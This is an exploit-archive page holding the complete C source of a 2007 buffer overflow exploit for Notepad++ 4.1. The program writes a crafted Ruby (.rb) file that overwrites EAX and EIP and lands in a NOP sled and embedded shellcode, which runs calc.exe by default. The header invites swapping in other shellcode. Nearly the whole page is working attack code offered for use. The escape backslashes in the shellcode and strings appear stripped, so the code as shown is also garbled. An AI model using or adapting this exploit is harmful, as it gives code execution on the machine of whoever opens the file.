[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : notepad++ 4.1 ruby file processing Buffer Overflow Exploit (win32)
# Published : 2007-05-12
# Author : vade79
# Previous Title : MagicISO <= 5.4 (build239) .cue File Local Buffer Overflow Exploit
# Next Title : eTrust Antivirus Agent r8 Local Privilege Elevation Exploit
/*[ notepad++[v4.1]: (win32) ruby file processing buffer overflow exploit. ]*
* *
* by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo) *
* *
* compile: *
* gcc xnotepad++.c -o xnotepad++ *
* *
* syntax: *
* ./xnotepad++ [-xe] -f filename *
* *
* notepad++ homepage/url: *
* http://sourceforge.net/projects/notepad-plus/ *
* http://notepad-plus.sourceforge.net/ *
* *
* notepad++ contains a buffer overflow vulnerability in the way it *
* processes ruby source files (.rb). this exploit works by overwriting *
* EAX which gets called during processing as "CALL DWORD EAX+4", so EAX *
* needs to point to a user-controlled area that contains another address *
* which will then become EIP. once EIP is controlled it simply jumps a *
* little bit forward in memory to the nop sled/shellcode. *
* *
* as of now, this will only be successful if the created file is opened *
* via "Edit with notepad++" on the file, not when opening a file from *
* inside notepad++. this is mainly to prove this vulnerability can be *
* exploited. *
* *
* exploitation method(file.rb): *
* [FILLERx32][NEW_EAX][FILLERx128]rn *
* # [NEW_EIPx1000][NOPSx4000][SHELLCODE]rn *
* *
* (i was a bit liberal with the new_eip/shellcode space, can pretty much *
* make it as large as you like. also, addresses with null-bytes are *
* allowed) *
* *
* if successful, notepad++ will spawn calc.exe by default, swap the *
* shellcode out if you want a different result. this was tested on winXP *
* SP2 ENG, if it is something else the EAX/EIP addresses may need to be *
* fished out of memory in your favorite debugger. *
***************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#ifndef __USE_BSD
#define __USE_BSD
#endif
#include <string.h>
#include <strings.h>
#include <signal.h>
#include <unistd.h>
#include <getopt.h>
#define DFL_EAX 0x000fd47c /* winXP SP2 ENG */
#define DFL_EIP 0x000fe3d0 /* winXP SP2 ENG */
/* win32_exec - EXITFUNC=thread CMD=calc.exe Size=164 */
/* Encoder=PexFnstenvSub http://metasploit.com */
static unsigned char x86_exec[] =
"x31xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13xd8"
"x19x25xc7x83xebxfcxe2xf4x24xf1x61xc7xd8x19xaex82"
"xe4x92x59xc2xa0x18xcax4cx97x01xaex98xf8x18xcex8e"
"x53x2dxaexc6x36x28xe5x5ex74x9dxe5xb3xdfxd8xefxca"
"xd9xdbxcex33xe3x4dx01xc3xadxfcxaex98xfcx18xcexa1"
"x53x15x6ex4cx87x05x24x2cx53x05xaexc6x33x90x79xe3"
"xdcxdax14x07xbcx92x65xf7x5dxd9x5dxcbx53x59x29x4c"
"xa8x05x88x4cxb0x11xcexcex53x99x95xc7xd8x19xaexaf"
"xe4x46x14x31xb8x4fxacx3fx5bxd9x5ex97xb0xf6xebx27"
"xb8x71xbdx39x52x17x72x38x3fx7ax44xabxbbx37x40xbf"
"xbdx19x25xc7";
struct{
unsigned int eax;
unsigned int eip;
char *file;
}tbl;
/* lonely extern. */
extern char *optarg;
/* functions. */
unsigned char write_rb(char *,unsigned int,unsigned int);
void printe(char *,short);
void usage(char *);
/* start. */
int main(int argc,char **argv){
signed int chr=0;
char *ptr;
printf("[*] notepad++[v4.1]: (win32) ruby file processing buffer over"
"flow exploit.n[*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)"
"nn");
tbl.eax=DFL_EAX;
tbl.eip=DFL_EIP;
while((chr=getopt(argc,argv,"f:x:e:"))!=EOF){
switch(chr){
case 'f':
if(!tbl.file){
if((ptr=rindex(optarg,'.'))&&!strcasecmp(ptr,".rb")){
if(!(tbl.file=(char *)strdup(optarg)))
printe("main(): allocating memory failed",1);
}
else{
if(!(tbl.file=(char *)malloc(strlen(optarg)+4)))
printe("main(): allocating memory failed",1);
sprintf(tbl.file,"%s.rb",optarg);
}
}
break;
case 'x':
sscanf(optarg,"%x",&tbl.eax);
break;
case 'e':
sscanf(optarg,"%x",&tbl.eip);
break;
default:
usage(argv[0]);
break;
}
}
if(!tbl.file)usage(argv[0]);
printf("[*] filename:ttt%sn",tbl.file);
printf("[*] EAX address:tt0x%.8xn",tbl.eax);
printf("[*] EIP address:tt0x%.8xnn",tbl.eip);
if(write_rb(tbl.file,tbl.eax,tbl.eip))
printe("failed to write to file.",1);
exit(0);
}
/* write the ruby file. */
unsigned char write_rb(char *file,unsigned int eax,unsigned int eip){
unsigned int i=0;
unsigned int real_eax=eax-4;
unsigned char filler='x';
unsigned char nop=0x90;
FILE *fs;
if(!(fs=fopen(file, "wb")))return(1);
for(i=0;i<32;i++){
fwrite(&filler,1,1,fs);
}
/* EAX overwrite, "CALL DWORD EAX+4" will be processed. */
fwrite(&real_eax,4,1,fs);
for(i=0;i<128;i++){
fwrite(&filler,1,1,fs);
}
/* from here on will be commented out, but loaded into memory. */
fwrite("rn# ",4,1,fs);
/* EAX overwrite will point here, and change the EIP to this. */
for(i=0;i<1000;i++){
fwrite(&eip,4,1,fs);
}
/* EIP from above will point into this nop sled. */
for(i=0;i<4000;i++){
fwrite(&nop,1,1,fs);
}
/* if all went well, execute away! */
fwrite(&x86_exec,sizeof(x86_exec),1,fs);
fwrite("rn",2,1,fs);
fclose(fs);
return(0);
}
/* error! */
void printe(char *err,short e){
printf("[!] %sn",err);
if(e)exit(1);
return;
}
/* usage. */
void usage(char *progname){
printf("syntax: %s [-xe] -f filenamenn",progname);
printf(" -f <file>tfilename to output.n");
printf(" -x <addr>tEAX address, points to new EIP address in memory (0x%.8x)n",
tbl.eax);
printf(" -e <addr>tEIP address, points to NOPS/shellcode (0x%.8x)nn",tbl.eip);
exit(0);
}
// www.Syue.com [2007-05-12]